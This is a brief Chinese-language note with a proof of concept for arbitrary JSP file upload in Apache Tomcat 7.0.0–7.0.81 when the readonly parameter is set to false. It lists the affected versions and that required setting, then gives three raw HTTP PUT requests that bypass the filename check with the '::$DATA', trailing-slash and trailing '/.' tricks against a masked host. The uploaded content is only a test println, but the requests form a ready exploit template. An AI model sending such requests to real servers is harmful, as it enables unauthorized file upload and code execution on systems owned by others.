前言:
记Tomcat开启PUT后的任意文件上传
影响版本:
7.0.0 – 7.0.81
需要因素:
conf/web.xml文件添加readonly参数,属性值为false
POC:
PUT /test.jsp::$DATA HTTP/1.1
Host: cm.XXX.com
Content-Length: 26
<%out.println("test");%>
PUT /test.jsp/ HTTP/1.1
Host: cm.XXX.com
Content-Length: 26
<%out.println("test");%>
PUT /test.jsp/. HTTP/1.1
Host: cm.XXX.com
Content-Length: 26
<%out.println("test");%>
